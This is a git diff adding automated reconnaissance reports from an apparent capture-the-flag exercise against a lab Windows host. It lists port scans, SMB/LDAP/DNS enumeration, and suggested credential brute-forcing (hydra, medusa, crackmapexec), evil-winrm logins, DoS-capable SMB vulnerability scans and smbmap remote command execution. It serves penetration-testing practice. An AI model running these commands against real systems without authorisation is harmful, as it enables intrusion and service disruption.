--script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49667 
--script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49673 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/tcp_49673_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/xml/tcp_49673_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49695 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49843 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml" 10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX 
"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format 
png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX 
"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or 
dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131 + + +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Errors.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Errors.md new file mode 100644 index 00000000..8de4cabf --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Errors.md 
@@ -0,0 +1,56 @@ +``` +[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9). +[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131 +[-] Error Output: + + +[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9). +[-] Command: dig AXFR -p 53 @10.129.243.131 +[-] Error Output: + + +[*] Service scan wkhtmltoimage (tcp/80/http/wkhtmltoimage) ran a command which returned a non-zero exit code (1). +[-] Command: wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png +[-] Error Output: +QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root' +Loading page (1/2) +[> ] 0% +[==============================> ] 50% +[==============================> ] 50% +Warning: Failed to load https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.2/themes/smoothness/jquery-ui.css (ignore) +Error: Failed to load https://fonts.googleapis.com/css?family=Open+Sans%7CMaven+Pro:500, with network status code 3 and http status code 0 - Host fonts.googleapis.com not found +Error: Failed to load https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js, with network status code 3 and http status code 0 - Host cdnjs.cloudflare.com not found +libva info: VA-API version 1.17.0 +libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so +libva info: Found init function __vaDriverInit_1_17 +libva error: /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so init failed +libva info: va_openDriver() returns 1 +libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so +libva info: Found init function __vaDriverInit_1_8 +libva info: va_openDriver() returns 0 +[============================================================] 100% +Rendering (2/2) +[> ] 0% +[===============> ] 25% 
+[============================================================] 100% +Done +Exit with code 1 due to network error: HostNotFoundError + + +[*] Service scan SMBClient (tcp/139/netbios-ssn/smbclient) ran a command which returned a non-zero exit code (1). +[-] Command: smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 +[-] Error Output: + + +[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9). +[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131 +[-] Error Output: + + +[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9). +[-] Command: dig AXFR -p 53 @10.129.243.131 +[-] Error Output: + + + +``` \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Manual Commands.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Manual Commands.md new file mode 100644 index 00000000..78e95072 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Manual Commands.md 
@@ -0,0 +1,221 @@ +```bash +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" 
http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" + + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). 
Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). 
Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d '' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d '' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] msrpc on tcp/49667 + + [-] RPC Client: + + rpcclient -p 49667 -U "" 10.129.243.131 + +[*] msrpc on tcp/49673 + + [-] RPC Client: + + rpcclient -p 49673 -U "" 10.129.243.131 + +[*] msrpc on tcp/49695 + + [-] RPC Client: + + rpcclient -p 49695 -U "" 10.129.243.131 + +[*] msrpc on tcp/49843 + + [-] RPC Client: + + rpcclient -p 49843 -U "" 10.129.243.131 + +[*] domain on tcp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. 
+ + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt + +[*] http on tcp/80 + + [-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists: + + feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt + + [-] Credential bruteforcing commands (don't run these without modifying them): + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area + + hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message" + + medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message" 
+ + [-] (nikto) old but generally reliable web server enumeration tool: + + nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt" + + [-] (wpscan) WordPress Security Scanner (useful if WordPress is found): + + wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt" + +[*] msrpc on tcp/135 + + [-] RPC Client: + + rpcclient -p 135 -U "" 10.129.243.131 + +[*] netbios-ssn on tcp/139 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/389 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt" + +[*] microsoft-ds on tcp/445 + + [-] Bruteforce SMB + + crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt" + + [-] Lookup SIDs + + impacket-lookupsid '[username]:[password]@10.129.243.131' + + [-] Nmap scans for SMB 
vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful: + + nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131 + +[*] ldap on tcp/3268 + + [-] ldapsearch command (modify before running): + + ldapsearch -x -D "" -w "" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt" + +[*] wsman on tcp/5985 + + [-] Bruteforce logins: + + crackmapexec winrm 10.129.243.131 -d '' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt' + + [-] Check login (requires credentials): + + crackmapexec winrm 10.129.243.131 -d '' -u '' -p '' + + [-] Evil WinRM (gem install evil-winrm): + + evil-winrm -u '' -p '' -i 10.129.243.131 + + evil-winrm -u '' -H '' -i 10.129.243.131 + +[*] domain on udp/53 + + [-] Use dnsrecon to bruteforce subdomains of a DNS domain. + + dnsrecon -n 10.129.243.131 -d -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_subdomain_bruteforce.txt + + [-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name. + + dnsrecon -n 10.129.243.131 -d 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default_manual.txt + + +``` \ No newline at end of file 
diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Patterns.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Patterns.md new file mode 100644 index 00000000..f6e1683e --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Patterns.md @@ -0,0 +1,4 @@ +Identified Architecture: 64-bit + +Identified HTTP Server: Microsoft-IIS/10.0 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - All TCP Ports.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - All TCP Ports.md new file mode 100644 index 00000000..10ab2e98 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - All TCP Ports.md 
